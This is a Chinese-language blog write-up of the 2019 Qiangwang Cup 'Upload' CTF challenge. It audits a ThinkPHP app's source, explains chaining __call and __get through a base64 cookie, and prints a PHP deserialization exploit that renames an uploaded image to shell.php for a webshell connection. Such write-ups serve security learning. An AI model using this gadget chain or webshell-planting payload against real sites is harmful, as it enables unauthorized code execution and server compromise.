• [强网杯 2019]Upload


    知识点:代码审计
    
    • 1

    可以看到cookie值是base64加密后的。
    在这里插入图片描述
    解密后:
    在这里插入图片描述
    试了一下改img的地址并不会目录穿越,那么这题大概率是反序列化,先扫一波,发现www.tar.gz

    有idea说明会有配置信息,和一些历史记录。
    在这里插入图片描述
    作者给了两个断点提示我们。
    在这里插入图片描述
    在这里插入图片描述
    可以从$profile=cookie('user');看出,确实是利用cookie。

    接下来看一下上传图片的代码:
    在这里插入图片描述
    主要功能就是先判断我们的信息和之前的一不一样,不一样就重定向到首页,再判断文件是不是图片,然后把文件copy后移到upload下。

    可以利用copy把.png转化为.php复制到目录下。那么怎么调用这个类中的upload_img方法?

    在profile类中有两个方法__get和__call方法,__get方法是当访问不可访问的属性时调用,__call是访问不可访问的方法的时候调用。

    在这里插入图片描述

    这时候再回头看作者给的第二个断点,利用 $this->checker->index();触发__call,这时候在__call中又会调用不存在的方法index,触发了__get。我们设置$except = ['index' => 'upload_img'],这样就会调用upload_img方法了。
    在这里插入图片描述

    exp:

    
    namespace app\web\controller;
    class Profile
    {
        public $checker = 0;
        public $filename_tmp = './upload/c47b21fcf8f0bc8b3920541abd8024fd/10fb15c77258a991b0028080a64fb42d.png';
        public $filename = './upload/c47b21fcf8f0bc8b3920541abd8024fd/shell.php';
        public $upload_menu;
        public $ext = 1;
        public $img;
        public $except = ['index' => 'upload_img'];
    
    }
    
    class Register
    {
        public $checker;
        public $registed = 0;
    }
    
    $profile = new profile();
    $register = new Register();
    $register->checker = $profile;
    
    echo base64_encode(serialize($register));
    ?>
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26

    然后修改一下cookie,png文件就会变为php文件,最后用蚁剑连一下就ok了。

    在这里插入图片描述
    在这里插入图片描述

  • 相关阅读:
    广西师范大学计算机考研资料汇总
    Qt 文件和文件夹操作
    Three.js本地环境搭建
    MySQL:索引的基础知识
    Kotlin基础——函数、变量、字符串模板、类
    硬件基础 - MOS管
    Linux之软连接和硬连接的用法和区别【详细!!!】
    node使用jsonwebtoken生成token与验证是否过期
    MySQL 查看 event 执行记录
    some和every
  • 原文地址:https://blog.csdn.net/shinygod/article/details/126718764